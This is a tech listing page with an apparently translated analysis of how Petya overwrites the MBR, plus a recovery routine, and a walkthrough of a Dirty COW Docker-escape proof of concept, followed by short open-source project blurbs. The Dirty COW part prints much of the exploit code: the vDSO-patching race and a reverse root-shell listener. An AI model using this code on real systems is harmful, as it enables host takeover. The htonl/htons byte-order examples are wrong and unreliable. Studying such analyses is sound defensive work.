Open Source Technologies
List of Open Source Technologies

How Petya Ransomware Infects the Master Boot Sector

Last week we began our technical analysis of Petya (also called NotPetya) and its so-called "killswitch". In that post we noted that Petya looks in the Windows folder for a file with the same name as itself (without extension), for example C:\Windows\Petya. If the file exists, Petya terminates by calling ExitProcess; if it does not, Petya creates it with the DELETE_ON_CLOSE attribute. This suggests the file is not a killswitch but a marker used to check whether the system has already been infected.

After the file is created, Petya proceeds to its disk-access routine. It first opens the C: volume and calls the DeviceIoControl API with the IOCTL_DISK_GET_DRIVE_GEOMETRY control code, which retrieves geometry information about the physical disk, in particular the number of bytes per sector. It allocates fixed memory by calling LocalAlloc and then overwrites the second sector of the C: volume with the newly allocated bytes. This is where the volume boot record runs the boot loader (NTLDR), so at least on Windows XP systems this breaks the boot sequence.

Figure 1: The second sector before and after it is overwritten.

Next, Petya checks its process flag to decide whether to overwrite the MBR with its own code or merely corrupt it. The flag was set earlier, when Petya searched memory for certain processes. If the flag indicates that the process "avp.exe" was found, Petya proceeds to the function we call corrupt_mbr. If the flag indicates that "avp.exe" was not found, it enters the function we call overwrite_mbr_func, which replaces the MBR.

Figure 2: Checking the process flag.

The corrupt_mbr function shown in Figure 2 simply writes bytes of uninitialized memory (0xBAADF00D) to the first 10 sectors of the disk, which renders the disk unbootable.

The other function, overwrite_mbr_func, is where the malware tries to overwrite the MBR with its own code. Petya starts by calling the CreateFileA API with the file name \\.\PhysicalDrive0, which corresponds to the master boot record. It then calls DeviceIoControl with the IOCTL_DISK_GET_PARTITION_INFO_EX control code to retrieve extended information about the type, size and nature of the MBR partition, and uses this to check that the PartitionStyle member of the PARTITION_INFORMATION_EX structure is indeed MBR.

Petya then uses the CryptGenRandom API to generate 60 (0x3C) random bytes and, using an index together with these 60 random bytes, generates the personal installation key.

Figure 3: The indexing function that generates the personal installation key.

Note that this generated key is what is displayed to the user as part of the ransom message.

Figure 4: The generated personal installation key.

Next, the malware reads 0x200 bytes from the first sector of the physical drive and XORs each byte with 7. These bytes are later written back to the disk at sector 34. To check that the disk is large enough to hold its malicious boot loader, it reads the LBA value of the last partition (which gives the cylinder, head and sector position on the disk) and makes sure it is greater than 0x28.

In the following steps Petya replaces several sectors of the physical drive:
• Sectors 0-18 are replaced with its own malicious MBR code, taking care to preserve the original disk signature and partition entries.
• Sector 32 is replaced with the Salsa20 key/nonce, the personal installation key and the Bitcoin address (shown in Figure 5 below).
• Sector 33 is filled with the hex byte '07'.
• Sector 34 is filled with the original first sector of the MBR XORed with 7.

Figure 5: The bytes written to sector 33.

If any step of the overwrite process fails, Petya retaliates by calling its corrupt_mbr function (see Figure 2). As mentioned above, this function corrupts the first 10 sectors of the disk, leaving it unbootable.

Petya's attack may have slowed for now, but that does not mean we can be complacent about the security of our systems. This recent outbreak shows that, even after the whole world learned of the damage caused by WannaCry, many systems were still not patched against this malware. After the Petya outbreak there is really no excuse for not patching systems promptly. Patching alone is not enough, however: a good defensive system can greatly reduce the threat posed by new malware.

MD5: 71b6a493388e7d0b40c83ce903bc6b04

Fortinet protection
AV signatures: W32/Petya.EOB!TR, W32/Agent.YXH!TR; other signatures are under investigation.
IPS signatures:
• MS.Office.RTF.File.OLE.autolink.Code.Execution (created April 13, 2017; last updated June 19, 2017)
• MS.SMB.Server.SMB1.Trans2.Secondary.Handling.Code.Execution (created March 14, 2017; last updated June 5, 2017)
In addition, the Fortinet WannaCry IPS rules appear to block exploitation of these vulnerabilities; the Fortinet team is verifying this claim.
Sandbox detection: Fortinet Sandbox (FSA) detects this attack.
TOR communication: outbound TOR traffic is blocked by the AppControl signature.
Microsoft emergency updates relevant to Petya:
• Security update for Microsoft Windows SMB Server: March 14, 2017
• Office 2016 security update: April 11, 2017

Translated by the China Trusted Cloud Community.
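As an added forensic illustration (written here, not taken from the Fortinet post), the following C routine applies the sector layout described above to a raw disk image: it checks that sector 33 is filled with 0x07 and recovers the original MBR from sector 34 by undoing the XOR with 7, verifying the 0x55 0xAA boot signature. The 512-byte sector size and the 40-sector sample image are assumptions constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SECTOR 512                /* assumed sector size (the geometry IOCTL reports the real one) */
#define PETYA_MARKER_SECTOR 33    /* filled with 0x07 */
#define PETYA_BACKUP_SECTOR 34    /* original first sector XORed with 7 */

/* Returns 1 if the image shows Petya's layout and `out` holds the recovered
 * original MBR, 0 if the markers do not match, -1 if the image is too small. */
int petya_recover_mbr(const uint8_t *img, size_t len, uint8_t out[SECTOR])
{
    if (len < (size_t)(PETYA_BACKUP_SECTOR + 1) * SECTOR)
        return -1;
    const uint8_t *marker = img + PETYA_MARKER_SECTOR * SECTOR;
    for (size_t i = 0; i < SECTOR; i++)
        if (marker[i] != 0x07)
            return 0;                        /* sector 33 is not all 0x07 */
    const uint8_t *backup = img + PETYA_BACKUP_SECTOR * SECTOR;
    for (size_t i = 0; i < SECTOR; i++)
        out[i] = backup[i] ^ 0x07;           /* undo the XOR with 7 */
    /* A genuine MBR ends with the 0x55 0xAA boot signature. */
    return (out[510] == 0x55 && out[511] == 0xAA) ? 1 : 0;
}

/* Constructed sample: a 40-sector image laid out the way Petya leaves it.
 * Sectors 0-18 (malicious loader) and 32 (key block) are left zeroed because
 * they play no part in the recovery. */
uint8_t g_image[40 * SECTOR];

void build_sample_image(void)
{
    uint8_t original[SECTOR] = {0};
    memset(original, 0x90, 440);                      /* stand-in boot code */
    memcpy(original + 440, "\x12\x34\x56\x78", 4);    /* disk signature */
    original[510] = 0x55;
    original[511] = 0xAA;
    memset(g_image, 0, sizeof g_image);
    memset(g_image + PETYA_MARKER_SECTOR * SECTOR, 0x07, SECTOR);
    for (int i = 0; i < SECTOR; i++)
        g_image[PETYA_BACKUP_SECTOR * SECTOR + i] = original[i] ^ 0x07;
}

int main(void)
{
    uint8_t mbr[SECTOR];
    build_sample_image();
    int r = petya_recover_mbr(g_image, sizeof g_image, mbr);
    printf("Petya layout %s\n", r == 1 ? "found; original MBR recovered" : "not found");
    return 0;
}
```

Petya overwrites the second sector of the C: volume with freshly allocated memory rather than backing it up, so this recovery covers the MBR only.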

2017-07-10 14:48:28

Analysis of the Dirty COW Docker Escape PoC

Wuhan University Docker Security Research Group (王鹃, 何能斌, 樊成阳)

I. Escape principle

vDSO: the vDSO ships with the kernel. When a program starts, the kernel maps it into an address range that is shared by all programs (this memory is read-only). The exploit uses the vulnerability's ability to write arbitrary data to an arbitrary address to write the payload into the vDSO memory page and to inline-hook the clock_gettime() function. Because the function at this address is shared by every program, whenever a program on the host calls clock_gettime() the payload runs once. The payload checks the UID of the calling process; if it is 0 (a root process) it connects back to the Docker container and sends a reverse shell, so inside the Docker container one obtains a shell with the host's root privileges. The listener is then closed and the original vDSO memory contents are restored.

II. Code execution flow

Main function:

```c
int main(int argc, char *argv[])
{
	struct prologue *prologue;
	struct mem_arg arg;
	uint16_t port;
	uint32_t ip;
	int s;

	ip = htonl(PAYLOAD_IP);
	port = htons(PAYLOAD_PORT);
	if (argc > 1) {
		if (parse_ip_port(argv[1], &ip, &port) != 0)
			return EXIT_FAILURE;
	}

	fprintf(stderr, "[*] payload target: %s:%d\n",
		inet_ntoa(*(struct in_addr *)&ip), ntohs(port));

	arg.vdso_addr = get_vdso_addr();
	if (arg.vdso_addr == NULL)
		return EXIT_FAILURE;

	prologue = fingerprint_prologue(arg.vdso_addr);
	if (prologue == NULL) {
		fprintf(stderr, "[-] this vDSO version isn't supported\n");
		fprintf(stderr, "    add first entry point instructions to prologues\n");
		return EXIT_FAILURE;
	}

	if (patch_payload(prologue, ip, port) == -1)
		return EXIT_FAILURE;

	if (build_vdso_patch(arg.vdso_addr, prologue) == -1)
		return EXIT_FAILURE;

	s = create_socket(port);
	if (s == -1)
		return EXIT_FAILURE;

	if (exploit(&arg, true) == -1) {
		fprintf(stderr, "exploit failed\n");
		return EXIT_FAILURE;
	}

	yeah(&arg, s);

	return EXIT_SUCCESS;
}
```

The flowchart is shown below:

III. Function analysis

1. htonl/htons

htonl: conventional in-memory byte order -> network byte order, 4 bytes (the post's example: htonl(0x1234) -> 0x4321).
htons: conventional in-memory byte order -> network byte order, 2 bytes (the post's example: htons(0x12) -> 0x21).

2. parse_ip_port

Prototype: `static int parse_ip_port(char *str, uint32_t *ip, uint16_t *port)`

Description: if the argument contains a ':', the characters before it are converted to an IP address and the characters after it to a port number, which is stored in port.

Example: parse_ip_port("127.0.0.1:1234", ip, port) yields IP = 127.0.0.1, PORT = 1234.

3. get_vdso_addr

Prototype:

```c
static void *get_vdso_addr(void)
{
	return (void *)getauxval(AT_SYSINFO_EHDR);
}
```

Description: obtains the vDSO address via getauxval().

4. fingerprint_prologue

Prototype: `static struct prologue *fingerprint_prologue(void *vdso_addr)`

Description: starting from the vDSO base address, finds the address of clock_gettime(), then compares the first few bytes of clock_gettime against each entry of the prologues[] array. If an entry matches, an inline hook is possible and the matching prologues entry is returned.

Key code:

```c
for (i = 0; i < ARRAY_SIZE(prologues); i++) {
	p = &prologues[i];
	if (memcmp((void *)clock_gettime_addr, p->opcodes, p->size) == 0)
		return p;
}
```

5. patch_payload

Prototype: `static int patch_payload(struct prologue *p, uint32_t ip, uint16_t port)`

Description: replaces the IP, PORT and prologue entry embedded in the payload with the new IP and PORT (taken from the arguments) and the prologue matched by fingerprint_prologue().

6. build_vdso_patch

Prototype: `static int build_vdso_patch(void *vdso_addr, struct prologue *prologue)`

Description: fills the vdso_patch array. If the memory at the address where the payload is to be placed is not zero, it reports "failed to find a place for the payload".

The elements of the vdso_patch array:

| field | vdso_patch[0]                                 | vdso_patch[1]                                                      |
| patch | payload                                       | buf = "e8 xxxxxxxx"                                                |
| copy  | address of a copy of the original memory data | address of a copy of the first prologue->size bytes of clock_gettime |
| size  | payload_len                                   | prologue->size                                                     |
| addr  | address the payload will be copied to         | address of clock_gettime                                           |

7. create_socket

Prototype: `static int create_socket(uint16_t port)`

Description: sets up a listening socket and waits for the payload, once executed, to connect to it.

8. exploit

Prototype: `static int exploit(struct mem_arg *arg, bool do_patch)`

Description: writes data to the specified memory address through the vulnerability.
do_patch = true => writes the payload into the vDSO and changes the first bytes of clock_gettime into a jmp to the payload.
do_patch = false => restores the original data at the vDSO address.

Main code:

```c
pid = fork();
if (pid == -1) {
	warn("fork");
	return -1;
} else if (pid == 0) {
	check(arg);
}

arg->stop = false;
pthread_create(&pth1, NULL, madviseThread, arg);
pthread_create(&pth2, NULL, ptrace_thread, arg);
```

Two processes are started here: the child process keeps checking whether the data has been written successfully, returning 0 on success and 1 otherwise. The main thread starts two threads: ptrace_thread writes to the vDSO, and madvise_thread releases the vDSO mapping, interfering with the ptrace thread and thereby triggering the vulnerability so that the write succeeds.

The ptrace write loop:

```c
while (n >= sizeof(long)) {
	memcpy(&value, s, sizeof(value));
	if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {
		warn("ptrace(PTRACE_POKETEXT)");
		return -1;
	}
	n -= sizeof(long);
	d += sizeof(long);
	s += sizeof(long);
}
```

The madvise release loop:

```c
while (!arg->stop) {
	if (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) {
		warn("madvise");
		break;
	}
}
```

9. yeah

Prototype: `static int yeah(struct mem_arg *arg, int s)`

Description: waits for a connection, restores the original vDSO contents, and handles sending and receiving data once connected.

Key code. Loop waiting for a connection; once one arrives, close the listening socket:

```c
while (1) {
	c = accept(s, (struct sockaddr *)&addr, &addr_len);
	if (c == -1) {
		if (errno == EINTR)
			continue;
		warn("accept");
		return -1;
	}
	break;
}
close(s);
```

After the connection succeeds, restore the vDSO:

```c
if (fork() == 0) {
	if (exploit(arg, false) == -1)
		fprintf(stderr, "[-] failed to restore vDSO\n");
	exit(0);
}
```

Bind standard input and output to the socket and relay the connection's data:

```c
fds[0].fd = STDIN_FILENO;
fds[0].events = POLLIN;
fds[1].fd = c;
fds[1].events = POLLIN;
nfds = 2;
while (nfds > 0) {
	if (poll(fds, nfds, -1) == -1) {
		if (errno == EINTR)
			continue;
		warn("poll");
		break;
	}
	if (fds[0].revents == POLLIN) {
		n = read(STDIN_FILENO, buf, sizeof(buf));
		if (n == -1) {
			if (errno != EINTR) {
				warn("read(STDIN_FILENO)");
				break;
			}
		} else if (n == 0) {
			break;
		} else {
			writeall(c, buf, n);
		}
	}
	if (fds[1].revents == POLLIN) {
		n = read(c, buf, sizeof(buf));
		if (n == -1) {
			if (errno != EINTR) {
				warn("read(c)");
				break;
			}
		} else if (n == 0) {
			break;
		} else {
			writeall(STDOUT_FILENO, buf, n);
		}
	}
}
```

2016-11-29 10:38:15

Ceph

Ceph is a unified, distributed file system designed for excellent performance, reliability and scalability. Its goals can be summarized in three points:
1. Easy scaling to multiple petabytes of capacity
2. High performance (input/output operations per second [IOPS] and bandwidth) across a variety of workloads
3. High reliability
These goals compete with each other (for example, scalability can reduce or limit performance, or affect reliability). Ceph's design also includes fault tolerance against single points of failure; it assumes that at large scale (petabyte-class storage) storage failures are the norm rather than the exception. The design does not assume any particular workload, but includes the ability to adapt to changing workloads and deliver the best performance. It accomplishes all of this while remaining POSIX-compatible, which allows applications that currently rely on POSIX semantics to be deployed transparently (with improvements targeted at Ceph).

2016-01-08 14:11:52

OpenStack

OpenStack is a free software and open-source project, licensed under the Apache License, that was jointly developed and launched by NASA (the US National Aeronautics and Space Administration) and Rackspace. OpenStack is an open-source cloud computing management platform composed of several main components that work together. It supports almost every type of cloud environment; the project's goal is to provide a cloud management platform that is simple to deploy, massively scalable, feature-rich and uniformly standardized. OpenStack delivers an Infrastructure-as-a-Service (IaaS) solution through a set of complementary services, each of which exposes an API for integration. OpenStack aims to provide software for building and managing public and private clouds. Its community comprises more than 130 companies and 1,350 developers, all of whom use OpenStack as a common front end for IaaS resources. The project's primary task is to simplify cloud deployment and give it good scalability. This article aims to provide the guidance needed to set up and manage your own public or private cloud using the OpenStack front end.

2016-01-08 14:09:31

Tboot

Trusted Boot (tboot) is an open source, pre-kernel/VMM module that uses Intel(R) Trusted Execution Technology (Intel(R) TXT) to perform a measured and verified launch of an OS kernel/VMM. The first OS code loaded is the Trusted Boot (called TBOOT) code, which sets up the platform for Intel TXT and initiates the measured launch before loading the OS kernel. In particular, the TBOOT module will set up the platform for a measured launch and then invoke the SENTER command.

To better understand the role of tboot, consider the platform phases associated with a measured launch, which are illustrated in the figure. The phases are as follows:

1. Pre-boot phase is performed by the system firmware (BIOS/UEFI). One of the goals of an Intel TXT-enabled BIOS is to initialize the platform to a state that will support a "measured launch." To do so, the firmware measures the Static Root of Trust and other platform components into PCRs 0 through 7. It also protects Intel TXT resources and locks the platform configuration.
2. IPL represents the normal boot process up until the time that the process would normally load and execute the kernel. The first module executed should now be the Trusted Boot (tboot) module.
3. TBOOT Pre-Launch is the part of tboot that determines whether a measured launch is possible and sets up the platform to perform the measured launch.
4. TBOOT Launch is the part of tboot that starts the measured launch process by executing the GETSEC[SENTER] instruction. This execution starts the dynamic chain of trust measurements, extending the root of trust measurement into PCR 17, and measures the tboot post-launch code into PCR 18.
5. TBOOT Post Launch is the code that executes as a result of the measured launch. Its purpose is to securely bring the platform to a protected, usable state. This is the first system code to be measured, and it starts the chain of measurements.
6. OS/VMM Post Launch includes the kernel and any other modules that need to be loaded. The kernel is responsible for measuring other modules before they are executed if they have not already been measured by the tboot code.
7. Regular Operation commences after a successful launch, when the OS/hypervisor performs its primary functionality (i.e., the same functionality as would occur in an environment without Intel TXT). However, there are some additional capabilities available to the OS/hypervisor, which must protect Intel TXT resources.
8. MLE Shutdown occurs before turning off or resetting the platform; there are certain steps the OS/hypervisor is required to take to exit the secure environment. While this phase could be followed by another measured launch, it is typically followed by a platform reset or power cycle.

Code · Web · Mailing list: tboot-devel@lists.sourceforge.net

2015-11-04 16:41:31

OAT

This project provides a cloud management tool software development kit (SDK), as source code and binaries.

The value of the OpenAttestation project
This project provides an SDK to create cloud management tools. These tools are capable of establishing hosts' integrity information by remotely retrieving and verifying integrity with Trusted Platform Module (TPM) quotes. OpenStack and oVirt both use OpenAttestation.

Key features include:
• Support for major Linux host operating systems
• PCR-based report schema and policy rules
• RESTful-based Query API
• Reference web portal/GUI implementation
• Historical PCR data tracking/comparison
• Whitelist management
• Flexible access control to the attestation server
• Support for Tomcat 2-way SSL/TLS for Query APIs
• Hook for ISVs to implement custom access control

Who it's for
This toolkit is available for cloud-distributing OEMs, operating system vendors, and system builders. OpenAttestation is used by OpenStack, oVirt, Fedora, Ubuntu, and Red Hat Enterprise Linux.

Project specifics
This project is distributed under the BSD license.

About Intel involvement
These open source optimizations are used in servers featuring Intel® Atom™ processors, Intel® Xeon® processors, and Intel® Xeon Phi™ coprocessors.

Wiki · Code · Web · Issues · Mailing list: oat-devel@lists.01.org

2015-11-04 16:25:39

MinnowBoard: MinnowBoard MAX

MinnowBoard MAX is the second-generation MinnowBoard (released in July 2014), updating and replacing the original MinnowBoard. The MinnowBoard MAX board has an upgraded 64-bit Intel® Atom™ E3800 (Bay Trail-I) processor with better graphics and revised I/O, shrinks the footprint by more than half, supports additional operating systems (Linux*, Android*, and Windows*) and significantly improves on the original board in price, performance, and energy consumption.

2015-11-04 16:00:40

EDKII

The EFI Developer Kit (EDK) is an Open Source release of the Framework Foundations, defined in the Framework Core Interface Specifications (CIS), plus a set of sample drivers and three sample targets implemented for the Nt32, Unix, and DUET platforms. In addition to open-sourcing the Framework Foundation code, the EDK allows for the development, debugging, and testing of EFI and DXE drivers, Option ROMs, and pre-boot applications. To address customer feedback gathered from using EDK, Intel started a remodeling plan now known as EDKII. It focuses on making it easy for customers to write a specific kind of module, and to port and customize modules for a platform.

Links: EDKII code · TPM2 drivers

2015-11-04 15:56:17

TPM2.0-TSS

TPM (Trusted Platform Module) 2.0 Software Stack (TSS). This stack consists of the following layers, from top to bottom:
• Feature API (FAPI), see specification 0.12 (published but still in progress and unimplemented)
• Enhanced System API (ESAPI) (specification in progress and unimplemented)
• System API (SAPI), see 1.0 specification (public, 0.97 implementation complete). This layer implements the system layer API level of the TSS 2.0 specification. These functions can be used to access all TPM 2.0 functions as described in Part 3 of the TPM 2.0 specification. The usefulness of this code extends to all users of the TPM, even those not planning to use the upper layers of the TSS.
• TPM Command Transmission Interface (TCTI), used by SAPI to communicate with the next lower layer (either the TAB/RM or the TPM 2.0 device driver); see the SAPI specification.
• Trusted Access Broker/Resource Manager (TAB/RM), see 0.91 specification (public, implementation complete). This layer sits between the system API library code and the TPM. It is a daemon that handles all multi-process coordination and manages the TPM's internal resources transparently to applications.

Since the FAPI and ESAPI haven't been implemented yet, this repository only contains the SAPI and the layers below it, plus a test application for exercising the SAPI. The test application, tpmclient, tests many of the commands against the TPM 2.0 simulator. The tpmclient application can be altered and used as a sandbox to test and develop any TPM 2.0 command sequences, and provides an excellent development and learning vehicle.

This site contains the code for the TPM (Trusted Platform Module) 2.0 Software Stack (TSS): TPM2.0-TSS

2015-11-04 15:35:56